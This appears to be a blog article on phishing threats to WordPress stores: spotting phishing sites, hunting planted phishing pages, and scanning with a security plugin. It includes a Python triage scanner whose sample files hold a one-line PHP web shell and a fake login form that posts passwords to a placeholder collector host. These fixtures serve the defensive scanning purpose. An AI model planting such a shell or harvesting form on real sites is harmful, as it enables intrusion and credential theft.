If you run an online store on WordPress, be aware that phishing scammers can scare away your potential customers. A poorly maintained WordPress site can be abused to host phishing pages, and your brand can be impersonated in phishing emails.

These cybercriminals do more than steal your money. By pretending to be you, they can harvest sensitive information such as passwords, addresses, and credit card numbers. Victims lose their privacy, and your store’s reputation is tarnished.

We will look at how online shopping scammers operate and how to avoid them. Before we get into that, however, cover the basics first.

Run a credible, well-maintained WordPress site so that it does not become an easy target: keep WordPress core, themes, and plugins updated, and choose a reliable hosting company. No host can guarantee that your website is secure, but a good one reduces your exposure.

What is a Phishing Attack?

Phishing is a type of cyber attack used to steal personal information. Scammers set up deceptive web pages and send emails that look legitimate, then use the data they collect to commit fraud.

For instance, scammers might send emails pretending to be from a reputable online store, asking recipients to click a link and enter their personal details in order to receive a discount code.

Scammers can also use spam comments to push malicious links to your visitors. Such comments typically contain a compliment, a request for more information, and a link at the end. Learn how to stop spam comments to prevent this from happening on your site.

How to Spot and Avoid Phishing Scams

Pay attention to these tips to help you recognize when someone is scamming you:

  • Check whether the connection is encrypted. The site should use HTTPS, so that data in transit is encrypted. Keep in mind that HTTPS only proves the connection is encrypted, not that the site is legitimate: phishing sites routinely use valid certificates, so the padlock alone tells you nothing about who runs the site.
  • Research the site’s credibility. Look for online reviews to see whether people have shopped there before. You can also visit business review sites such as the Better Business Bureau to check the reliability of the seller.
  • Confirm the authenticity of the seller’s contact details. Examine the site’s contact page and try to reach them. If the page lacks basic information such as an email address and phone number, that is a red flag for a phishing website.
  • Monitor your bank and credit card statements. Stay up to date with your bank so you notice any unexpected charges or withdrawals quickly.
  • Examine the page’s URL path. In some cases a credible site has been compromised and the attackers have planted a phishing page on it. Most of the time the path of such a page makes no sense, for example example.com/wp-content/gallery/media/login.php. WordPress’s real login page is wp-login.php at the site root; a login page inside a media folder is never legitimate.

How to Clean Phishing Pages on Your WordPress Site

Scammers often gain access to your site the same way your customers get spoofed: through fake emails and web pages. A typical case is an administrator who visited a fake admin login page and entered their credentials there.

Most WordPress administrators have difficulty identifying phishing pages because they are hidden: nothing on the site links to them. You usually only find them when someone reports them or when you inspect your web files directly.

Phishing pages are usually buried deep within your directories. Download a full copy of your files first (for example over SFTP), then browse through the folders and subfolders.

Look for files with the same name as the page they try to mimic. If the phishing page imitates your contact page, for instance, look for files named “contact.” Also check subfolders that are not linked from the main site, such as the themes, plugins, and uploads folders. Any PHP file under wp-content/uploads is especially suspect, because that folder should hold only media. Phishing files can be hidden anywhere.
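To automate the two checks described above (the suspicious-path check from the tips list and the folder-by-folder hunt for planted login or contact pages), here is an added example scanner that is not part of the original article or of any plugin it mentions. It walks a downloaded copy of the site and reports three things: executable files under wp-content/uploads, login/contact-style page names anywhere under wp-content, and any page whose form collects a password and posts it to another host. The sample site tree it builds is constructed for the demonstration, and the collector host collector.invalid is a made-up name.

```python
"""Triage a downloaded WordPress document root for likely phishing pages.

Added example, not from the original article. Point scan_site() at a local
copy of the site (for example one pulled over SFTP) and review every finding
by hand; the rules are heuristics for triage, not proof of compromise.
"""
import os
import re
import tempfile

# Names that look like a page worth impersonating. The genuine WordPress
# login is only ever wp-login.php in the document root, so any other file
# with a name like this under wp-content deserves a look.
SUSPECT_NAME = re.compile(r"login|signin|verify|account|contact|checkout|billing", re.I)
PAGE_EXT = (".php", ".phtml", ".php5", ".html", ".htm")
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")
PASSWORD_FIELD = re.compile(rb"<input[^>]+type=['\"]?password", re.I)
EXTERNAL_ACTION = re.compile(rb"<form[^>]*action=['\"]https?://([^/'\"\s]+)", re.I)


def inspect_file(root, full):
    """Return (relative_path, [reasons]) for one file; reasons may be empty."""
    rel = os.path.relpath(full, root).replace(os.sep, "/")
    lower = rel.lower()
    name = os.path.basename(lower)
    reasons = []

    # Rule 1: the uploads tree is for media; nothing there should be executable.
    if lower.startswith("wp-content/uploads/") and name.endswith(EXEC_EXT):
        reasons.append("executable file inside wp-content/uploads")

    # Rule 2: a login-, account- or contact-style page under wp-content
    # (themes, plugins, uploads or any other subfolder) instead of the root.
    if lower.startswith("wp-content/") and name.endswith(PAGE_EXT) and SUSPECT_NAME.search(name):
        reasons.append("login/contact-style page name under wp-content")

    # Rule 3: a form that collects a password and posts it to a different
    # host is the signature of a credential-harvesting page wherever it sits.
    if name.endswith(PAGE_EXT):
        with open(full, "rb") as fh:
            head = fh.read(64 * 1024)  # the form markup is near the top
        ext = EXTERNAL_ACTION.search(head)
        if ext and PASSWORD_FIELD.search(head):
            host = ext.group(1).decode("ascii", "replace")
            reasons.append("password field posting to external host " + host)
    return rel, reasons


def scan_site(root):
    """Walk the site copy and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            rel, reasons = inspect_file(root, os.path.join(dirpath, fname))
            findings.extend((rel, r) for r in reasons)
    return sorted(findings)


# Constructed sample tree: a few legitimate files plus planted phishing pages.
# The path wp-content/gallery/media/login.php mirrors the article's example.
SAMPLE_FILES = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';",
    "wp-login.php": "<form method=\"post\" action=\"wp-login.php\">"
                    "<input type=\"password\" name=\"pwd\"></form>",
    "wp-content/themes/shop/style.css": "/* theme stylesheet */",
    "wp-content/themes/shop/page-contact.php": "<?php get_header(); the_content(); get_footer();",
    "wp-content/uploads/2023/06/photo.jpg": "not really a jpeg, just sample bytes",
    "wp-content/uploads/2023/06/contact.php": "<?php eval(base64_decode($_POST['d']));",
    "wp-content/gallery/media/login.php": (
        "<form method=\"post\" action=\"https://collector.invalid/grab.php\">"
        "<input type=\"text\" name=\"log\"><input type=\"password\" name=\"pwd\"></form>"
    ),
}


def demo():
    """Write the constructed tree into a temp dir, scan it, return findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_site(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Expect noise from rule 2: a legitimate theme template such as page-contact.php will be reported, so compare each hit against the pristine theme or plugin package before deleting anything. The genuine wp-login.php at the root is not reported, because its form posts back to the same site and it sits outside wp-content.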

With so many folders to go through, cleaning your site by hand takes a lot of time. Alternatively, you can install a security plugin to help.

Removing Phishing Pages with a WordPress Plugin

To help you detect phishing pages, we recommend using Sucuri Security. Once you install and activate it, follow the steps below:

      1. Generate a free API key. The key lets the plugin store its audit logs on Sucuri’s servers, so an attacker who gets into your site cannot delete them, and it enables statistics in the dashboard. From your WordPress dashboard, head over to Sucuri Security -> Dashboard and click Generate API Key.

      2. Make sure that the website and email fields are filled out correctly. Tick the Terms of Service and Privacy Policy agreement, and press Submit.

      3. Once the key is active, Sucuri automatically scans your website. The results appear on the Sucuri dashboard.

By default, Sucuri performs a daily scan of your website. To change the frequency, go to Sucuri Security -> Settings and select the Scanner tab. Tick the box for sucuriscan_scheduled_scan, select the desired schedule (once daily, weekly, monthly, and more), and hit Submit when you’re done.

Building trust is crucial for online businesses, and securing your website is part of that. Be wary of emails and pages that pretend to be from WordPress, so they can’t steal your login credentials, and scan your website regularly to remove any malware. Best of luck.